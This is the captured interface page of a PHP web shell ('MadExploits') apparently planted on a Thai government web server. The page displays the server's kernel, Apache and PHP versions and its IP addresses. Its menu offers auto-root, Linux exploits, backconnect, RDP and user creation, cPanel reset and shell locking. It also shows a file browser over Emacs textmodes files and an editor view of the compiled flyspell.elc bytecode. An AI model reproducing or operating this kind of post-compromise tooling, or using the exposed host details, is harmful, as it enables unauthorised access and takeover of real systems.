Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
textmodes /
[ HOME SHELL ]
Name
Size
Permission
Action
artist.elc
156.01
KB
-rw-r--r--
bib-mode.elc
7.43
KB
-rw-r--r--
bibtex-style.elc
5.39
KB
-rw-r--r--
bibtex.elc
157.5
KB
-rw-r--r--
conf-mode.elc
28.99
KB
-rw-r--r--
css-mode.elc
13.28
KB
-rw-r--r--
dns-mode.elc
6.9
KB
-rw-r--r--
enriched.elc
13.78
KB
-rw-r--r--
fill.elc
34.12
KB
-rw-r--r--
flyspell.elc
52.56
KB
-rw-r--r--
ispell.elc
97.58
KB
-rw-r--r--
makeinfo.elc
6.2
KB
-rw-r--r--
nroff-mode.elc
10.21
KB
-rw-r--r--
page-ext.elc
15.45
KB
-rw-r--r--
page.elc
3.19
KB
-rw-r--r--
paragraphs.elc
15.18
KB
-rw-r--r--
picture.elc
26.27
KB
-rw-r--r--
po.elc
2.84
KB
-rw-r--r--
refbib.elc
18.08
KB
-rw-r--r--
refer.elc
9.21
KB
-rw-r--r--
refill.elc
6.17
KB
-rw-r--r--
reftex-auc.elc
6
KB
-rw-r--r--
reftex-cite.elc
26.53
KB
-rw-r--r--
reftex-dcr.elc
12.53
KB
-rw-r--r--
reftex-global.elc
12.67
KB
-rw-r--r--
reftex-index.elc
61.35
KB
-rw-r--r--
reftex-parse.elc
21.31
KB
-rw-r--r--
reftex-ref.elc
19.57
KB
-rw-r--r--
reftex-sel.elc
16.58
KB
-rw-r--r--
reftex-toc.elc
30.88
KB
-rw-r--r--
reftex-vars.elc
80.53
KB
-rw-r--r--
reftex.elc
56.79
KB
-rw-r--r--
remember.elc
12.73
KB
-rw-r--r--
rst.elc
72.23
KB
-rw-r--r--
sgml-mode.elc
80.43
KB
-rw-r--r--
spell.elc
4.04
KB
-rw-r--r--
table.elc
161.74
KB
-rw-r--r--
tex-mode.elc
87.19
KB
-rw-r--r--
texinfmt.elc
83.84
KB
-rw-r--r--
texinfo.elc
35.12
KB
-rw-r--r--
texnfo-upd.elc
45.86
KB
-rw-r--r--
text-mode.elc
7.39
KB
-rw-r--r--
tildify.elc
8.47
KB
-rw-r--r--
two-column.elc
12.86
KB
-rw-r--r--
underline.elc
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : flyspell.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:05:18 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/textmodes/flyspell.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`flyspell.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\305\306\307\310\311\312\301\312\313&\207" [require ispell custom-declare-group flyspell nil "Spell checking on the fly." :tag "FlySpell" :prefix "flyspell-" :group processes] 12) #@112 How Flyspell should indicate misspelled words. Non-nil means use highlight, nil means use minibuffer messages. (custom-declare-variable 'flyspell-highlight-flag 't '(#$ . 836) :group 'flyspell :type 'boolean) #@233 Non-nil means Flyspell reports a repeated word as an error. See `flyspell-mark-duplications-exceptions' to add exceptions to this rule. Detection of repeated words is not implemented in "large" regions; see `flyspell-large-region'. (custom-declare-variable 'flyspell-mark-duplications-flag 't '(#$ . 1052) :group 'flyspell :type 'boolean) #@265 A list of exceptions for duplicated words. It should be a list of (LANGUAGE . EXCEPTION-LIST). LANGUAGE is matched against the current dictionary and EXCEPTION-LIST is a list of strings. The duplicated word is downcased before it is compared with the exceptions. (custom-declare-variable 'flyspell-mark-duplications-exceptions ''(("francais" "nous" "vous")) '(#$ . 1398) :group 'flyspell :type '(alist :key-type string :value-type (repeat string))) #@73 Non-nil means, sort the corrections alphabetically before popping them. (custom-declare-variable 'flyspell-sort-corrections 'nil '(#$ . 1854) :group 'flyspell :version "21.1" :type 'boolean) #@442 The maximum distance for finding duplicates of unrecognized words. This applies to the feature that when a word is not found in the dictionary, if the same spelling occurs elsewhere in the buffer, Flyspell uses a different face (`flyspell-duplicate') to highlight it. This variable specifies how far to search to find such a duplicate. -1 means no limit (search the whole buffer). 0 means do not search for duplicate unrecognized spellings. (custom-declare-variable 'flyspell-duplicate-distance '-1 '(#$ . 2052) :group 'flyspell :version "21.1" :type '(choice (const :tag "no limit" -1) number)) #@75 The number of seconds to wait before checking, after a "delayed" command. (custom-declare-variable 'flyspell-delay '3 '(#$ . 2654) :group 'flyspell :type 'number) #@157 Non-nil means misspelled words remain highlighted until corrected. If this variable is nil, only the most recently detected misspelled word is highlighted. (custom-declare-variable 'flyspell-persistent-highlight 't '(#$ . 2824) :group 'flyspell :type 'boolean) #@82 Non-nil means highlight incorrect words even if a property exists for this word. (custom-declare-variable 'flyspell-highlight-properties 't '(#$ . 3091) :group 'flyspell :type 'boolean) #@86 The standard list of delayed commands for Flyspell. See `flyspell-delayed-commands'. (custom-declare-variable 'flyspell-default-delayed-commands ''(self-insert-command delete-backward-char backward-or-forward-delete-char delete-char scrollbar-vertical-drag backward-delete-char-untabify) '(#$ . 3283) :group 'flyspell :version "21.1" :type '(repeat (symbol))) #@172 List of commands that are "delayed" for Flyspell mode. After these commands, Flyspell checking is delayed for a short time, whose length is specified by `flyspell-delay'. (custom-declare-variable 'flyspell-delayed-commands 'nil '(#$ . 3650) :group 'flyspell :type '(repeat (symbol))) #@94 The standard list of deplacement commands for Flyspell. See `flyspell-deplacement-commands'. (custom-declare-variable 'flyspell-default-deplacement-commands ''(next-line previous-line scroll-up scroll-down) '(#$ . 3940) :group 'flyspell :version "21.1" :type '(repeat (symbol))) #@173 List of commands that are "deplacement" for Flyspell mode. After these commands, Flyspell checking is performed only if the previous command was not the very same command. (custom-declare-variable 'flyspell-deplacement-commands 'nil '(#$ . 4226) :group 'flyspell :version "21.1" :type '(repeat (symbol))) #@76 Non-nil means that Flyspell should display a welcome message when started. (custom-declare-variable 'flyspell-issue-welcome-flag 't '(#$ . 4537) :group 'flyspell :type 'boolean) #@65 Non-nil means that Flyspell emits messages when checking words. (custom-declare-variable 'flyspell-issue-message-flag 't '(#$ . 4721) :group 'flyspell :type 'boolean) #@388 List of functions to be called when incorrect words are encountered. Each function is given three arguments. The first two arguments are the beginning and the end of the incorrect region. The third is either the symbol `doublon' or the list of possible corrections as returned by `ispell-parse-output'. If any of the functions return non-nil, the word is not highlighted as incorrect. (custom-declare-variable 'flyspell-incorrect-hook 'nil '(#$ . 4895) :group 'flyspell :version "21.1" :type 'hook) #@447 A string that is the name of the default dictionary. This is passed to the `ispell-change-dictionary' when flyspell is started. If the variable `ispell-local-dictionary' or `ispell-dictionary' is non-nil when flyspell is started, the value of that variable is used instead of `flyspell-default-dictionary' to select the default dictionary. Otherwise, if `flyspell-default-dictionary' is nil, it means to use Ispell's ultimate default dictionary. (custom-declare-variable 'flyspell-default-dictionary 'nil '(#$ . 5403) :group 'flyspell :version "21.1" :type '(choice string (const :tag "Default" nil))) #@68 A string that is the regular expression that matches TeX commands. (custom-declare-variable 'flyspell-tex-command-regexp '"\\(\\(begin\\|end\\)[ ]*{\\|\\(cite[a-z*]*\\|label\\|ref\\|eqref\\|usepackage\\|documentclass\\)[ ]*\\(\\[[^]]*\\]\\)?{[^{}]*\\)" '(#$ . 6011) :group 'flyspell :version "21.1" :type 'string) #@235 Non-nil means check even inside TeX math environment. TeX math environments are discovered by the TEXMATHP that implemented inside the texmathp.el Emacs package. That package may be found at: http://strw.leidenuniv.nl/~dominik/Tools (custom-declare-variable 'flyspell-check-tex-math-command 'nil '(#$ . 6334) :group 'flyspell :type 'boolean) #@63 List of dictionary names that consider `-' as word delimiter. (custom-declare-variable 'flyspell-dictionaries-that-consider-dash-as-word-delimiter ''("francais" "deutsch8" "norsk") '(#$ . 6683) :group 'flyspell :version "21.1" :type '(repeat (string))) #@51 If non-nil, add correction to abbreviation table. (custom-declare-variable 'flyspell-abbrev-p 'nil '(#$ . 6942) :group 'flyspell :version "21.1" :type 'boolean) #@63 If non-nil, prefer global abbrev table to local abbrev table. (custom-declare-variable 'flyspell-use-global-abbrev-table-p 'nil '(#$ . 7109) :group 'flyspell :version "21.1" :type 'boolean) #@115 String displayed on the modeline when flyspell is active. Set this to nil if you don't want a modeline indicator. (custom-declare-variable 'flyspell-mode-line-string '" Fly" '(#$ . 7306) :group 'flyspell :type '(choice string (const :tag "None" nil))) #@425 The threshold that determines if a region is small. If the region is smaller than this number of characters, `flyspell-region' checks the words sequentially using regular flyspell methods. Else, if the region is large, a new Ispell process is spawned for speed. Doubled words are not detected in a large region, because Ispell does not check for them. If `flyspell-large-region' is nil, all regions are treated as small. (custom-declare-variable 'flyspell-large-region '1000 '(#$ . 7565) :group 'flyspell :version "21.1" :type '(choice number (const :tag "All small" nil))) #@58 Function for inserting word by flyspell upon correction. (custom-declare-variable 'flyspell-insert-function '#'insert '(#$ . 8148) :group 'flyspell :type 'function) #@53 String used to indicate an incorrect word starting. (custom-declare-variable 'flyspell-before-incorrect-word-string 'nil '(#$ . 8319) :group 'flyspell :type '(choice string (const nil))) #@51 String used to indicate an incorrect word ending. (custom-declare-variable 'flyspell-after-incorrect-word-string 'nil '(#$ . 8512) :group 'flyspell :type '(choice string (const nil))) #@57 Non-nil means that flyspell uses M-TAB to correct word. (custom-declare-variable 'flyspell-use-meta-tab 't '(#$ . 8702) :group 'flyspell :type 'boolean :initialize 'custom-initialize-default :set #[(sym val) "\303\304 \nL\205\n \305#\207" [flyspell-mode-map sym val define-key "\211" flyspell-auto-correct-word] 5]) #@47 The key binding for flyspell auto correction. (custom-declare-variable 'flyspell-auto-correct-binding '[(control 59)] '(#$ . 9025) :group 'flyspell) #@234 Function providing per-mode customization over which words are flyspelled. Returns t to continue checking, nil otherwise. Flyspell mode sets this variable to whatever is the `flyspell-mode-predicate' property of the major mode name. (defvar flyspell-generic-check-word-predicate nil (#$ . 9181)) (byte-code "\300\301!\210\302\303\301\"\210\304\305\306\307#\210\304\310\306\307#\207" [make-variable-buffer-local flyspell-generic-check-word-predicate defvaralias flyspell-generic-check-word-p put mail-mode flyspell-mode-predicate mail-mode-flyspell-verify message-mode] 4) #@73 Function used for `flyspell-generic-check-word-predicate' in Mail mode. (defalias 'mail-mode-flyspell-verify #[nil "\212eb\210\304\305\306!\307Q\310\311#\210`)\312\301!\204 d\202' \212db\210\313 \310\311#\210`)`W\203A \212\314 \210\315\316!)\205T `\317\225V\202T `\nV\203K \310\202T \212\314 \210\315\320!)?*\207" [mail-header-separator message-signature-separator signature-begin header-end re-search-forward "^" regexp-quote "$" nil t boundp re-search-backward beginning-of-line looking-at "^Subject:" 0 "[>}|]\\|To:"] 5 (#$ . 9759)]) (put 'texinfo-mode 'flyspell-mode-predicate 'texinfo-mode-flyspell-verify) #@76 Function used for `flyspell-generic-check-word-predicate' in Texinfo mode. (defalias 'texinfo-mode-flyspell-verify #[nil "\212\300v\210\301\302!)?\207" [-1 looking-at "@"] 2 (#$ . 10382)]) (put 'tex-mode 'flyspell-mode-predicate 'tex-mode-flyspell-verify) #@74 Function used for `flyspell-generic-check-word-predicate' in LaTeX mode. (defalias 'tex-mode-flyspell-verify #[nil "\212\301\302\303\304#)?\205' \212`\305 \210\306\307\310 \304#\205% \311\224Y\205% \311\225X*?\207" [this re-search-backward "^[ ]*%%%[ ]+Local" nil t beginning-of-line re-search-forward "\\\\\\(cite\\|label\\|ref\\){[^}]*}" line-end-position 0] 4 (#$ . 10644)]) (byte-code "\300\301\302\303#\210\300\304\302\303#\210\300\305\302\303#\207" [put sgml-mode flyspell-mode-predicate sgml-mode-flyspell-verify html-mode nxml-mode] 4) #@73 Function used for `flyspell-generic-check-word-predicate' in SGML mode. (defalias 'sgml-mode-flyspell-verify #[nil "\212\300\301!\206 \302\303!\206 \300\304!\205 \302\305!)?\207" [looking-at "[^<\n]*>" looking-back "<[^>\n]*" "[^&\n]*;" "&[^;\n]*"] 2 (#$ . 11199)]) #@58 Faces corresponding to text in programming-mode buffers. (defvar flyspell-prog-text-faces '(font-lock-string-face font-lock-comment-face font-lock-doc-face) (#$ . 11474)) #@72 Used for `flyspell-generic-check-word-predicate' in programming modes. (defalias 'flyspell-generic-progmode-verify #[nil "\302`\303\"\211 >)\207" [f flyspell-prog-text-faces get-text-property face] 4 (#$ . 11651)]) #@51 Turn on `flyspell-mode' for comments and strings. (defalias 'flyspell-prog-mode #[nil "\301\302\303!\210\304\305!\207" [flyspell-generic-check-word-predicate flyspell-generic-progmode-verify flyspell-mode 1 run-hooks flyspell-prog-mode-hook] 2 (#$ . 11873) nil]) #@28 Overlay compatibility kit. (autoload 'make-overlay "overlay" '(#$ . 12143) t) #@28 Overlay compatibility kit. (autoload 'overlayp "overlay" '(#$ . 12227) t) #@28 Overlay compatibility kit. (autoload 'overlays-in "overlay" '(#$ . 12307) t) #@28 Overlay compatibility kit. (autoload 'delete-overlay "overlay" '(#$ . 12390) t) #@28 Overlay compatibility kit. (autoload 'overlays-at "overlay" '(#$ . 12476) t) #@28 Overlay compatibility kit. (autoload 'overlay-put "overlay" '(#$ . 12559) t) #@28 Overlay compatibility kit. (autoload 'overlay-get "overlay" '(#$ . 12642) t) #@28 Overlay compatibility kit. (autoload 'previous-overlay-change "overlay" '(#$ . 12725) t) #@48 Keymap for Flyspell to put on erroneous words. (defvar flyspell-mouse-map (byte-code "\301 \302\303\304#\210\302\305\306#\210)\207" [map make-sparse-keymap define-key [down-mouse-2] flyspell-correct-word [mouse-2] undefined] 4) (#$ . 12820)) #@60 Minor mode keymap for Flyspell mode--for the whole buffer. (defvar flyspell-mode-map (byte-code "\303 \203 \304\305\306#\210\304\n\307#\210\304\310\311#\210\304\312\306#\210\304\313\314#\210)\207" [map flyspell-use-meta-tab flyspell-auto-correct-binding make-sparse-keymap define-key "\211" flyspell-auto-correct-word flyspell-auto-correct-previous-word [(control 44)] flyspell-goto-next-error [(control 46)] [3 36] flyspell-correct-word-before-point] 4) (#$ . 13072)) #@69 *Non-nil means that the `-' char is considered as a word delimiter. (defvar flyspell-consider-dash-as-word-delimiter-flag nil (#$ . -13556)) (byte-code "\301\302!\210\303B\304\303!\204 \305\303\306\"\210\301\303!\210\307B\304\307!\204&